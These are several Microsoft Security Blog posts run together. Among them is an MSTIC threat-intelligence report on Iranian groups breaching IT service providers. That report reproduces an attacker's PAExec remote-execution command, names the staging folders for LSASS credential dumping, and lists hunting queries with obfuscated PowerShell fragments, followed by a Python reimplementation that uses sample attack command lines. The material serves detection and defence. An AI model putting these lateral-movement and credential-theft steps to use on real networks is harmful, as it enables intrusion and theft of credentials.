Roughly 76 percent of Microsoft customers have already begun Zero Trust implementation. Because we’re now in a boundaryless world of hybrid work, Zero Trust is exactly the security approach that’s needed. Zero Trust rests on three guiding principles: verify explicitly, use least-privilege access, and assume breach. Microsoft is building an identity platform to simplify and secure all relationships among employees, partners, customers, workloads, and smart devices—whether you’re a developer, an IT administrator, or a user. “There are 579 attacks happening every second,” Vasu adds. “So, effective security has to start with a strong identity foundation. We see identity as the ‘trust fabric’ of this new boundaryless collaboration.”

Managing compliance, risk, and privacy

For organizations across every sector, a tremendous amount of data is accessed, processed, and stored every day. This, along with an ever-growing universe of data regulations, is creating complexity and compliance risk. “We have personal data, which is in movement and in flux all the time,” Vasu explains. “The lines between work and home networks are all blurring. So that creates a lot of pressure about how to protect data, and how to ensure that all regulations are being followed.”

Many organizations use manual processes to discover how much personal data they have stored. There’s often a lack of actionable insights to help mitigate security and privacy risks. That’s why Microsoft recently announced privacy management for Microsoft 365. This new solution helps organizations identify critical privacy risks, automate privacy operations, and empower employees to be smart when they’re handling sensitive data.

For chief information security officers (CISOs) and risk officers, Vasu proposes a four-fold solution for balancing compliance and privacy: First, know your data. “Who’s accessing your data?” she asks. “How is your data moving? Do you have the right label? Do you have the right sensitivities? How are you protecting against insider risk? Do you have the right permissions level?” Second, establish a baseline of activity and measure anomalies to that baseline. You can’t just look at the world through the auditors’ eyes—pass or fail. You need to help your team see how they’re making progress. Third, partner with providers who can help you stay on top of changes in laws and regulations in all markets where you operate. Fourth, establish a collaborative process internally to address the risks when they arise. “It’s not just a security problem; it’s an organizational problem,” she stresses. That means ensuring that HR, legal, compliance, and risk teams are all working with your security operations center.

Zero Trust is not just about outside-in protection; it’s also inside-out. Organizations need to build compliance protections into processes to defend against insider threats. “You can’t secure a door and leave a window open,” is how Vasu sums it up. “You have to think about your security posture as an interdependent whole—both external and internal threats.” Organizations can take an easy first step just by implementing passwordless technologies like Windows Hello for desktops or the Microsoft Authenticator app for mobile devices.

Building tomorrow’s talent

For almost every two cybersecurity jobs in the United States today, a third job is sitting empty because of a shortage of skilled people. That’s why Microsoft is launching a national campaign with United States community colleges to help skill and recruit 250,000 people into the cybersecurity workforce by 2025:

  • Community colleges are everywhere. There are 1,044 community colleges located in every state and territory, and in every setting: urban, suburban, rural, and tribal.
  • Community colleges are more affordable. Tuition averages just $3,770 annually (versus $10,560 for four-year public colleges). Moreover, 59 percent of community college students can access financial aid.
  • Community colleges are diverse. Students at community colleges are 40 percent Black or African American or Hispanic. In addition, 29 percent are among their family’s first generation to attend college, while 20 percent are students with disabilities, and 5 percent are veterans. And 57 percent of students at community colleges are women.

“In March of this year, we announced Microsoft’s Career Connector,” Vasu explains, “a service that will help place 50,000 job seekers skilled by Microsoft’s nonprofit and learning partners in the Microsoft ecosystem over the next three years.” Career Connector has a specific focus on women and underrepresented minorities in technology. “I’m proud to report that our global skills initiative has reached more than 30 million people in 249 countries,” she adds. Microsoft is also extending through the end of 2021 all the free courses and low-cost certifications offered in our global skilling initiative through Microsoft Learn. To help fill talent gaps in compliance, Microsoft also offers certification courses for security, compliance, and identity. “No matter who you are, you can be a defender.”

The attackers in today’s asymmetric cyberwar come from all backgrounds, ethnicities, and regions. For that reason, we as defenders need to be just as diverse. “Along with diversity, inclusion goes hand in hand,” Vasu explains. “It’s important that we commit to hiring from places we may have not thought about before, to build a place where everyone feels like they belong.” She sees solving the talent shortage as a three-step process: get more people aware of cybersecurity; help them build the skills they need; and create spaces where everyone feels they can do their best work. As Vasu sees it: “Ultimately, security is all about humans. Whether you’ve been in the workforce for 30 years and want a change, or you’re just starting your career; either way, there’s a place for you here.”

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


Iranian targeting of IT sector on the rise

November 18th, 2021

Iranian threat actors are increasing attacks against IT services companies as a way to access their customers’ networks. This activity is notable because targeting third parties has the potential to exploit more sensitive organizations by taking advantage of trust and access in a supply chain. Microsoft has observed multiple Iranian threat actors targeting the IT services sector in attacks that aim to steal sign-in credentials belonging to downstream customer networks to enable further attacks. The Microsoft Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU) assess this is part of a broader espionage objective to compromise organizations of interest to the Iranian regime.

Until July 2021, Microsoft had observed relatively little history of Iranian actors attacking Indian targets. As India and other nations rise as major IT services hubs, more nation-state actors follow the supply chain to target these providers’ public and private sector customers around the world, matching nation-state interests.

To date this year, Microsoft has issued more than 1,600 notifications to over 40 IT companies in response to Iranian targeting, compared to 48 notifications in 2020, a significant increase from years past (Figure 1). The focus of several Iranian threat groups on the IT sector spiked particularly in the last six months: roughly 10 to 13 percent of our notifications were related to Iranian threat activity in that period, compared to 2.5 percent in the six months prior (Figure 2). Most of the targeting is focused on IT services companies based in India, as well as several companies based in Israel and the United Arab Emirates. Although different in technique from other recent supply chain attacks, these attacks are another example of how nation-state actors increasingly target supply chains as indirect vectors to achieve their objectives.

Figure 1: Number of notifications sent to IT Services related to Iran-based actor targeting (column chart for 2019, 2020, and 2021)

Figure 2: Percentage of notifications per quarter sent to IT Services NSNs related to Iran-based activity (column chart for four quarters starting Oct-Dec 2020)

As with any observed nation state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Observed activity

In July 2021, a group that MSTIC tracks as DEV-0228 and assesses as based in Iran compromised a single Israel-based IT company that provides business management software. Based on MSTIC’s assessment, DEV-0228 used access to that IT company to extend their attacks and compromise downstream customers in the defense, energy, and legal sectors in Israel. In September, we detected a separate Iranian group, DEV-0056, compromising email accounts at a Bahrain-based IT integration company that works on IT integration with Bahrain Government clients, who were likely DEV-0056’s ultimate target. DEV-0056 also compromised various accounts at a partially government-owned organization in the Middle East that provides information and communications technology to the defense and transportation sectors, which are targets of interest to the Iranian regime. DEV-0056 maintained persistence at the IT integration organization through at least October.

MSTIC detected a significant increase in these and other Iranian groups targeting IT companies based in India beginning in mid-August. From mid-August to late September, we issued 1,788 nation state notifications (NSNs) across Iranian actors to enterprise customers in India, roughly 80% of which were to IT companies, an exponential rise from the 10 notifications we issued the previous three years in response to previous Iranian targeting. Iranian cyber actors have rarely targeted India, and the lack of pressing geopolitical issues that would have prompted such a shift suggests that this targeting is for indirect access to subsidiaries and clients outside India.

Credential theft leads to downstream compromise

DEV-0228 dumped credentials from the on-premises network of an IT provider based in Israel in early July. Over the next two months, the group compromised at least a dozen other organizations, several of which have strong public relations with the compromised IT company. MSTIC assesses at least four (4) of those victims were compromised using the acquired credentials and access from the IT company in the July and August attacks. Here are two such examples:

  • DEV-0228 operators compromised the on-premises network of a law firm in Israel in August through an account managed by the IT provider via PAExec (a custom version of the Windows Sysinternals tool PsExec).

Pa.exe  \\###.##.#.## -u {user name}\{domain name} -p "********" -s cmd.exe

  • DEV-0228 operators also compromised a defense company in Israel by signing into an email account provisioned for the same IT provider on the victim’s Office 365 tenant. The attackers likely obtained those credentials from the initial compromise of the IT provider in July.

Custom implant to establish persistence

DEV-0228 operators used a custom implant to establish persistence on victim hosts and then dumped LSASS. The implant is a custom remote access Trojan (RAT) that uses Dropbox as a command and control (C2) channel and is disguised as RuntimeBroker.exe or svchost.exe.

Operators staged their tools in a C:\Windows\TAPI directory on the victim hosts:

  • C:\Windows\TAPI\lsa.exe
  • C:\Windows\TAPI\pa.exe
  • C:\Windows\TAPI\pc.exe (procdump)
  • C:\Windows\TAPI\Rar.exe

Microsoft will continue to monitor DEV-0228 and DEV-0056 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.

Indicators of compromise (IOCs)

Type Indicator
svchost.exe 2a1044e9e6e87a032f80c6d9ea6ae61bbbb053c0a21b186ecb3b812b49eb03b7
svchost.exe 9ab7e99ed84f94a7b6409b87e56dc6e1143b05034a5e4455e8c555dbbcd0d2dd
lsa.exe 43109fbe8b752f7a9076eaafa417d9ae5c6e827cd5374b866672263fdebd5ec3
wdmsvc.exe 18a072ccfab239e140d8f682e2874e8ff19d94311fc8bb9564043d3e0deda54b
Pa.exe (PAExec.exe) ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

Recommended defenses

The following guidance can mitigate the techniques described in the threat activity:

Detections

Microsoft 365 Defender

Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

  • Backdoor:MSIL/ShellClient.A
  • Backdoor:MSIL/ShellClient.A!dll
  • Trojan:MSIL/Mimikatz.BA!MTB

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on the network:

  • DEV-0228 actor activity
  • DEV-0056 actor activity

The following alerts might also indicate activity associated with this threat. They can, however, be triggered by unrelated activity and are listed here for reference:

  • Suspicious connection to remote service
  • Possible command-and-control activity
  • Suspicious access to LSASS service
  • Sensitive credential memory read

Figure 3: Microsoft 365 Defender alert showing credential dumping activity (screenshot of the Sensitive credential memory read alert)

Microsoft 365 Defender correlates related alerts into consolidated incidents to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to the activity described in this blog.

Advanced hunting queries

Microsoft Sentinel

The indicators of compromise (IoCs) included in this blog post can be used by Microsoft Sentinel customers for detection purposes using the queries detailed below.

Command Line Activity November 2021

This hunting query looks for process command line activity related to observed activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0056CommandLineActivityNovember2021.yaml

FilePath/Hashes query November 2021

This hunting query looks for file paths/hashes related to observed activity as detailed in this blog.

https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/Dev-0228FilePathHashesNovember2021.yaml

In addition to these queries, there are equivalent queries that use the Advanced SIEM Information Model (ASIM) to look for the same activity.

https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/ASimProcess/imProcess_Dev-0056CommandLineActivityNovember2021-ASIM.yaml

https://github.com/Azure/Azure-Sentinel/tree/master/Detections/ASimFileEvent/imFileEvent_Dev-0228FilePathHashesNovember2021-ASIM.yaml

Microsoft 365 Defender

To locate malicious activity related to the activity described in this blog, customers can run the following queries in Microsoft 365 Defender or Microsoft Defender for Endpoint.

Identify use of PAExec in your environment

Look for PAExec.exe process executions in your environment.

DeviceProcessEvents
// Match on the version-info original name as well, so a renamed copy (such as pa.exe) is still found
| where FileName =~ "paexec.exe" or ProcessVersionInfoOriginalFileName =~ "paexec.exe"
// Exclude installs under Program Files and the PAExec service itself
| where not(ProcessCommandLine has_any("program files", "-service"))

Identify files created in the Windows\Tapi directory

Look for files created in the Windows\Tapi directory.

DeviceFileEvents
// Directory in which the actor staged lsa.exe, pa.exe, pc.exe and Rar.exe
| where FolderPath has @"C:\Windows\TAPI"

Suspicious PowerShell commands

Look for suspicious PowerShell process execution.

DeviceProcessEvents
// Known command-line fragments, or a Base64-decoded payload run through nested iex with -nop
| where ProcessCommandLine has_any("/q /c color f7&", "Net.We$()bClient", "$b,15,$b.Length-15") or
(ProcessCommandLine has "FromBase64String" and ProcessCommandLine has_all("-nop", "iex", "(iex"))
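The three hunting queries above are KQL and need a Microsoft 365 Defender tenant to run. As an added example that is not part of the original post or Microsoft's code, the following Python re-implements their matching logic over a few constructed DeviceProcessEvents and DeviceFileEvents records (device names, paths and command lines are made up) so the rules can be unit-tested offline. Python substring checks approximate KQL `has`/`has_any`, which match whole terms, so these filters are slightly broader than the originals.

```python
"""Added example, not Microsoft's code: the three Microsoft 365 Defender hunting
queries above re-implemented as Python filters over constructed sample events,
so the detection logic can be unit-tested offline before being run as KQL."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Subset of the DeviceProcessEvents columns the queries use."""
    device: str
    file_name: str            # FileName
    original_file_name: str   # ProcessVersionInfoOriginalFileName
    command_line: str         # ProcessCommandLine


@dataclass
class FileEvent:
    """Subset of the DeviceFileEvents columns the queries use."""
    device: str
    folder_path: str          # FolderPath
    file_name: str            # FileName


def is_paexec_use(ev: ProcessEvent) -> bool:
    """Query 1: PAExec run outside Program Files and not as the PAExec service.
    Matching the version-info original name also catches a renamed binary
    (the actor staged it as pa.exe)."""
    if "paexec.exe" not in (ev.file_name.lower(), ev.original_file_name.lower()):
        return False
    cmd = ev.command_line.lower()
    # Substring checks approximate KQL has_any(), which matches whole terms.
    return not ("program files" in cmd or "-service" in cmd)


def is_tapi_staging(ev: FileEvent) -> bool:
    """Query 2: file created under the C:\\Windows\\TAPI staging directory."""
    return r"c:\windows\tapi" in ev.folder_path.lower()


# Literal fragments from query 3, lower-cased because KQL has_any() is case-insensitive.
SUSPICIOUS_FRAGMENTS = ("/q /c color f7&", "net.we$()bclient", "$b,15,$b.length-15")


def is_suspicious_powershell(ev: ProcessEvent) -> bool:
    """Query 3: known fragments, or Base64 decode combined with -nop and nested iex."""
    cmd = ev.command_line.lower()
    if any(frag in cmd for frag in SUSPICIOUS_FRAGMENTS):
        return True
    return "frombase64string" in cmd and all(t in cmd for t in ("-nop", "iex", "(iex"))


def hunt(process_events, file_events) -> dict:
    """Return {device: sorted rule names that fired}, the per-host triage view."""
    hits = {}
    for ev in process_events:
        for rule, check in (("paexec_use", is_paexec_use),
                            ("suspicious_powershell", is_suspicious_powershell)):
            if check(ev):
                hits.setdefault(ev.device, set()).add(rule)
    for fev in file_events:
        if is_tapi_staging(fev):
            hits.setdefault(fev.device, set()).add("tapi_staging")
    return {device: sorted(rules) for device, rules in hits.items()}


# Constructed sample telemetry (device names, paths and command lines are made up).
SAMPLE_PROCESS_EVENTS = [
    # Renamed PAExec launched from the staging directory: should fire.
    ProcessEvent("WS01", "pa.exe", "PAExec.exe",
                 r'C:\Windows\TAPI\pa.exe \\{target} -u {domain}\{user} -p "********" -s cmd.exe'),
    # Legitimately installed PAExec service: excluded by the query's filter.
    ProcessEvent("WS02", "PAExec.exe", "PAExec.exe",
                 r'"C:\Program Files\PAExec\PAExec.exe" -service'),
    # Encoded, nested-iex PowerShell launch (payload is a placeholder): should fire.
    ProcessEvent("WS01", "powershell.exe", "PowerShell.EXE",
                 'powershell.exe -nop -w hidden -c "iex ((iex ([Convert]::FromBase64String(\'QUJD\'))))"'),
    # Ordinary administrative PowerShell: should not fire.
    ProcessEvent("WS03", "powershell.exe", "PowerShell.EXE",
                 "powershell.exe -Command Get-Service -Name Spooler"),
]
SAMPLE_FILE_EVENTS = [
    FileEvent("WS01", r"C:\Windows\TAPI", "lsa.exe"),          # staged tool: should fire
    FileEvent("WS03", r"C:\Windows\System32", "tapisrv.dll"),  # benign TAPI component
]

if __name__ == "__main__":
    for device, rules in hunt(SAMPLE_PROCESS_EVENTS, SAMPLE_FILE_EVENTS).items():
        print(f"{device}: {', '.join(rules)}")
```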

Adopting a Zero Trust approach throughout the lifecycle of data

November 17th, 2021

Instead of believing everything behind the corporate firewall is safe, the Zero Trust model assumes breach and verifies each request as though it originates from an uncontrolled network. Regardless of where the request originates or what resource it accesses, Zero Trust teaches us to “never trust, always verify.”

At Microsoft, we consider Zero Trust an essential component of any organization’s security plan based on these three principles:

  1. Verify explicitly: Always authenticate and authorize based on all available data points, including user identity, location, device health, service or workload, data classification, and anomalies.
  2. Use least privileged access: Limit user access with just-in-time (JIT) and just-enough-access (JEA), risk-based adaptive policies, and data protection to protect both data and productivity.
  3. Assume breach: Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

In this article, we will focus on the third principle (assume breach) and how encryption and data protection play a significant role in getting prepared for a potential breach in your data center.

Protect data with end-to-end encryption

As part of a comprehensive security posture, data should always be encrypted so that in the event where an attacker is able to intercept customer data, they are unable to decipher usable information.

End-to-end encryption is applied throughout the following three stages: at rest, in transit, and in use.

Three icons representing data at rest, in transit, and in use.

Data protection is critical across all three of these stages, so let’s dive a little deeper into how each stage works and how it can be implemented.

Protect data at rest

Encryption at rest protects stored data. Attacks against data at rest include attempts to obtain physical access to the hardware on which the data is stored and then compromise the data it contains. In such an attack, a server’s hard drive may have been mishandled during maintenance, allowing an attacker to remove it. Later the attacker would put the hard drive into a computer under their control to attempt to access the data.

Encryption at rest is designed to prevent the attacker from accessing the unencrypted data by ensuring the data is encrypted when on disk. If an attacker obtains a hard drive with encrypted data but not the encryption keys, the attacker must defeat the encryption to read the data. This attack is much more complex and resource-consuming than accessing unencrypted data on a hard drive. For this reason, encryption at rest is highly recommended and is a high priority requirement for many organizations.

Flow chart of Microsoft Azure Key Vault encryption process.

At rest, it is important that your data is protected through disk encryption which enables IT administrators to encrypt your entire virtual machine (VM) or operating system (OS) disks.

One of the concerns that we hear from customers is how can they reduce the chances that certificates, passwords, and other secrets may accidentally get leaked. A best practice is to use central storage of application secrets in a secured vault to have full control of their distribution. When using a secured vault, application developers no longer need to store security information in their applications, which reduces risk by eliminating the need to make this information part of the code.

Data encryption at rest is a mandatory step toward data privacy, compliance, and data sovereignty. These Microsoft Azure security services are recommended for this purpose:

  • Azure Storage Service Encryption: Microsoft Azure Storage uses server-side encryption (SSE) to automatically encrypt your data when it is persisted to the cloud. Azure Storage encryption protects your data to help you to meet your organizational security and compliance commitments.
  • SQL Server Transparent Data Encryption (TDE): Encryption of a database file is done at the page level with Transparent Data Encryption. The pages in an encrypted database are encrypted before they’re written to disk and are decrypted when read into memory.
  • Secrets management: Microsoft Azure Key Vault can be used to securely store and tightly control access to tokens, passwords, certificates, API keys, and other secrets.
  • Key management: Azure Key Vault can also be used as a key management solution. Azure Key Vault makes it easy to create and control the encryption keys used to encrypt your data.
  • Certificate management: Azure Key Vault lets you easily provision, manage, and deploy public and private Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates for use with Azure and your internal connected resources.
  • Hardware security modules (HSM): Store and protect your secrets and keys either in software or in FIPS 140-2 Level 2 validated HSMs.

Protect data in transit

A “data in transit” condition exists when data is transferred within the data center between different network elements or data centers.

Organizations that fail to protect data in transit are more susceptible to man-in-the-middle attacks, eavesdropping, and session hijacking. These attacks can be the first step attackers use to gain access to confidential data.

For example, the recent NOBELIUM cyberattacks show that no one can be 100 percent protected against a breach. During this attack, 18,000 SolarWinds customers were vulnerable, including Fortune 500 companies and multiple agencies in the US government.

Data in transit should cover two independent encryption mechanisms:

  1. Application layer—the HTTPS and TLS encryption that takes place between the client and server node.
  2. Data link layer—encryption that takes place on the frames transferred over the Ethernet protocol, just above the physical connections.

It is recommended customers not only encrypt data on the application layer but also have visibility into their data in transit by using TLS inspection capabilities.

These Microsoft Azure network security services are recommended for this purpose:

As part of TLS inspection, these network services fully decrypt and re-encrypt the traffic that traverses them, add protections such as an intrusion detection and prevention system (IDPS), and give customers visibility into the data itself.

To provide customers double encryption when sending data between regions, Azure provides data link layer encryption utilizing media access control security (MACSec).

MACSec is a vendor-independent IEEE standard (802.1AE) that provides data link layer, point-to-point encryption of traffic between network devices. Packets are encrypted and decrypted in hardware before being sent, which is designed to defeat even a physical man-in-the-middle attack. Because MACSec encrypts at line rate, it can secure data without the performance overhead and complexity of IP-layer encryption technologies such as IPSec/GRE.

Data in transit is encrypted on the wire to block physical man-in-the-middle attacks.

Whenever Azure customer traffic moves between Azure datacenters—outside physical boundaries not controlled by Microsoft (or on behalf of Microsoft)—a data link layer encryption method using the IEEE 802.1AE MAC Security Standards is applied from point-to-point across the underlying network hardware. The packets are encrypted and decrypted on the devices before being sent and applied by default for all Azure traffic traveling within a region or between regions.

Protect data in use

We often hear from customers that they are concerned about moving extremely sensitive IP and data to the cloud. To effectively protect assets, not only must data be secured at rest and in transit, but data must also be protected from threats while in use.

To protect data in use for services across your software-as-a-service (SaaS), platform-as-a-service (PaaS), and infrastructure-as-a-service (IaaS) cloud models, we offer two important capabilities: Azure confidential computing and centralized storage of application secrets.

Azure confidential computing encrypts data in memory in hardware-based trusted execution environments (TEEs) and only processes it once the cloud environment is verified, preventing data access from cloud operators, malicious admins, and privileged software such as the hypervisor. By protecting data in use, organizations can achieve the highest levels of data privacy and enable secure multi-party data analytics, without giving access to their data.

These Azure services are recommended to be used for ‘data in use’ protection:

  1. Application Enclaves: You can optimize for confidentiality at the application level by customizing your app to run in confidential VMs with Intel SGX application enclaves, or lift and shift existing applications using an ISV partner.
  2. Confidential VMs: You can optimize for ease of use by moving your existing workloads to Azure and making them confidential without changing any code, by leveraging encryption across the entire VM with AMD SEV-SNP technologies.
  3. Trusted Launch: Trusted Launch with Secure boot and vTPMs ensure your virtual machines boot with legitimate code, helping you protect against advanced and persistent attack techniques such as rootkits and bootkits.
  4. Confidential Containers: AKS worker nodes are available on confidential computing VMs, allowing you to secure your containers with encrypted memory.
  5. Confidential Services: We are continuing to onboard Azure confidential services to leverage within your solutions, now supporting Azure confidential ledger (in preview), Azure SQL Always Encrypted, Azure Key Vault Managed HSM, and Microsoft Azure Attestation, all running on Azure confidential computing.

Strengthening your organization’s data protection posture

Protecting your data throughout its lifecycle and wherever it resides or travels is the most critical step to safeguard your business data.

To learn more about the end-to-end implementation of data protection as a critical part of your Zero Trust strategy, visit our Deployment Center.

To see how your organization’s data security posture stacks up against the Zero Trust maturity model, take this interactive quiz.

For more information about a Zero Trust security posture, visit the Microsoft Zero Trust website.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Adopting a Zero Trust approach throughout the lifecycle of data appeared first on Microsoft Security Blog.


The importance of identity and Microsoft Azure Active Directory resilience

November 16th, 2021

I love hearing my colleagues explain how they came to the industry because so many of their stories are unusual. I’m surprised how often I hear that people got into computer science by some fortuitous accident. Although he loved computers from the time he was a kid, Oren Melzer never expected to work in the software industry. Today, he’s a Principal Group Engineering Manager in the Identity and Network Access organization, working on one of our team’s most important efforts: resilience.

When he was growing up, Oren’s business-minded parents encouraged him to develop an entrepreneurial spirit. And he did. Oren’s journey reminds us that entrepreneurship isn’t limited to building a new business from scratch, where you start off doing everything yourself. Even though he’s worked in a large organization in a large company for the past several years, Oren has enjoyed participating in many entrepreneurial efforts, including his groundbreaking work on making cloud services resilient, as he tells Nadim Abdo, Corporate Vice President of Identity and Network Access Engineering.

Oren’s interview with Nadim has been edited for clarity and length. We’ve included some video snippets so you can learn more about Oren’s personal journey and his views on the work he does.

Nadim: Oren, I’d like to start by asking what got you into the industry and computers?

Oren: It all started when I was really young. My parents were immigrants from Israel to Louisville, Kentucky. Not a ton of Israelis in Kentucky! My dad was an engineer, so we had computers super early. I’m dating myself, but we had a Commodore that ran Microsoft Disk Operating System (MS-DOS). I was probably five or six, tinkering around on that thing. When my dad showed me Quick Basic interpreter (QBasic), I created a simple little program that would ask, “What is your name?” And you’d say, “Oren.” And it would say, “Hello, Oren.” I remember thinking, “That’s the coolest thing in the world. I can make a computer program that I can talk to!” I loved doing stuff on computers from then on.

Nadim: I have fond memories of QBasic as well. That integrated development environment (IDE) and debugger were pretty awesome. So, you wrote programs from an early age—do you remember any other programs you did?

Oren: Three months after I was born, my parents started a food manufacturing company, which they still run. It’s a family business, so after a few years, they put me to work. But they realized pretty quickly that this computer thing was probably more useful than me putting cans in boxes. So, I became the company computer guy.

They had software to do all their accounting and inventory, and there was a production planning module that cost $40,000. They asked me what I thought, and I said that, with what I knew, I could write it for a lot less money. I was a high schooler, and they basically threw me into this problem. I didn’t have anybody to tell me what to do or how to do it. I wrote a bunch of Visual Basic macros that pulled data from the system, pulled up some editable forms, and then popped out a production plan. That was an entire summer project, 20-plus years ago, and their company still runs on that software to this day. I actually still get tech support calls to fix random bugs.

Nadim: That’s amazing! You must’ve learned the value of customer obsession from that experience. And obviously, this segues to how you now work on some of the most critical services in the entire industry. What learnings from that experience really carried through?

Oren: First, you have to build something that works. I wrote this software when I was 16 or 17 years old, and if it breaks, they can’t produce—30 or 40 people on a factory floor don’t know what to run or they’re scrambling to try to do the same thing manually.

I didn’t know about source control then, but I learned early on to make a backup copy when making changes. If something broke, I’d copy in the one from yesterday that worked. And there’d be weird edge cases, like some new item that the string was too long to fit into how many characters I assumed it could be. So, I learned to be very fault-tolerant, catch errors, and keep on going.

Nadim: When you went to college, what did you choose as your focus? 

Oren: I was convinced that software was something everybody was doing. And I like to do things that other people aren’t doing. So, I went into college as a biomedical engineering major. I really wanted to combine the computer thing with biology, another passion I had in high school. I wanted to build medical devices and software for medical devices, pacemakers, and so forth.

A couple of things got me into software. Early on, I met another computer science major, and he became a good friend. He’s actually at Microsoft now. We started a book business together, which we wrote software for.

Video 1: Oren talks about the book business he started in college with a friend.

For a while, I actually thought this thing could be my career, but during our downtime one summer, I looked for a biomedical internship. I couldn’t find one, but who showed up at our company fair? Microsoft. I had my first internship in the identity organization after that. I loved it so much I changed my major. I ended up getting a master’s in computer science and came to Microsoft full-time. I’ve been in identity ever since.

Nadim: That’s wonderful! What do you like best about working in the identity space?

Oren: What’s cool about identity is how foundational it is, like the electric company. Very few people wake up in the morning and say, “I want to use my identity today.” But whatever you do want to do—when you look at all the Microsoft products and applications at any number of businesses—the very first question you always need to ask is, who are you? What is your identity?

Identity enables all those experiences. And when it doesn’t work, people can’t work. I tell people, “I challenge you to find another job where you can impact more people in a day than our identity system does.” We throw around numbers like “billions of authentications” like it’s nothing. That level of impact—that level of making a difference for practically every working person, and many people in college, all over the world—is practically unmatched anywhere else at Microsoft or in the industry, as far as I know.

Nadim: That’s right. The scale is certainly incredible, as is the criticality and security. With that kind of scale, there are obviously enormous technical challenges. And you’ve worked on a number of different areas within identity, right?

Oren: I started on a product called Windows CardSpace, formerly known as InfoCard. It was an identity selector in Windows, where somebody could issue you an identity to use online. To some extent, we were ahead of our time, and eventually, that project was shelved. I moved to developer frameworks and worked on Windows Identity Foundation, which became part of the Microsoft .NET Framework. I also worked on Active Directory Federation Services (AD FS).

My first entry into cloud services was the Access Control Service, which allowed admins to configure federated authentication for their apps. You could authenticate using Microsoft accounts and Google accounts and also secure your application. It was one of the identity organization’s first modern services. And it was really interesting to move from shipping software in a box, which people can download or not, to shipping something that runs all the time and is critical to day-to-day life.

Nadim: And certainly, an absolutely critical journey as part of cloud transformation with everybody using these services. Tell me about your role and what you like best about it?

Oren: I now own an area called “authentication resilience” in identity. We could build the best services in the world, with the most features, but if they’re not up all day, every day, we’re basically failing our customers. And the impact of that is enormous. We’ve learned hard lessons over the years on what can go wrong in a distributed system, so we’ve developed systems that enable us to operate, and continue to operate, in case all kinds of outages occur, whether from networking problems somewhere in Microsoft Azure, a bug that gets released in our system, or key management problems.

We’re building, number one, a set of components to ensure that if the core identity system goes down, users won’t notice. We do that by allowing sessions to live longer, while also being more secure, and to react in real-time. Secondly, we built an entire decorrelated backup authentication stack where we can continue to serve authentications even if the primary system goes down completely. The vast majority of users can stay productive and have no idea that anything has gone wrong.

The goal is to prevent the outage from happening, but if a partial outage does occur, to minimize the impact.

Video 2: Oren describes his job to his parents.

Nadim: How would you say that Microsoft is differentiating our offerings in terms of resilience?

Oren: When we started on this resilience journey a couple of years ago, we weren’t aware of any cross-industry efforts on service resilience. Existing identity standards just assume everything is going to work. With OAuth and security assertion markup language (SAML), you make a request, you get a response. There was no playbook or roadmap for figuring out how to build the next level of real-time signals, more resilience, or backup systems. We weren’t going to wait for one, so we just built it. Ultimately, a working group formed in the OpenID Foundation called Shared Signals and Events, and we actively participated. I went to many of those early meetings, trying to figure out how to build a real-time resilient identity system.

It’s one thing to talk about theory. It’s another to say, “We’ve built this already. Here’s what it looks like.” As a big believer in open standards, I’m proud that we didn’t just say, “The standard must be exactly like what we built, otherwise we’re not going to be on it.” We have actually adapted our implementation to the industry standard. And we’ve been able to get our partners elsewhere in the industry—people who build other software that works with Microsoft Azure Active Directory (Azure AD)—to adopt this standard as well. Now we can say that we have resilience and continuous access, not just for Microsoft properties, but also for many other long-tail apps, built by other people, that we know our customers rely on every day.

Nadim: One of the things that’s awesome about our team is we have so many different individuals with so much talent, with different interests, passions, and ways of looking at the world. How would you describe yourself, your approach, and your strengths?

Oren: People think of software engineers hunched over in a dark room in front of a desk, pounding on a keyboard, looking at ones and zeros on a screen. I like code as much as anybody, but I am a people person. I really thrive on human interaction, on enabling somebody to be successful, and on finding the right project for someone working for me who may be struggling a bit.

The same is true when I think about the impact of the software we build. I don’t just think about the billion requests our backup systems serve today. I think about a billion people who might’ve been frustrated because they couldn’t check their email. And now they can because this backup system kicked in. What motivates me is the people—both the ones I can see in the office and the ones I can’t see. I know they’re there. Knowing that the work I do can make a difference for those people, both in terms of the technology I build and of the people I manage, is extremely motivational for me.

Video 3: Oren shares what he likes best about his job.

Learn more

Learn more about cloud resilience.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The importance of identity and Microsoft Azure Active Directory resilience appeared first on Microsoft Security Blog.

Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021

November 16th, 2021

Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At CyberWarCon 2021, MSTIC analysts presented their analysis of these trends in Iranian nation-state actor activity during a session titled “The Iranian evolution: Observed changes in Iranian malicious network operations”. This blog summarizes that research and the topics covered in the presentation, and demonstrates MSTIC’s ongoing efforts to track these actors and protect customers from the related threats.

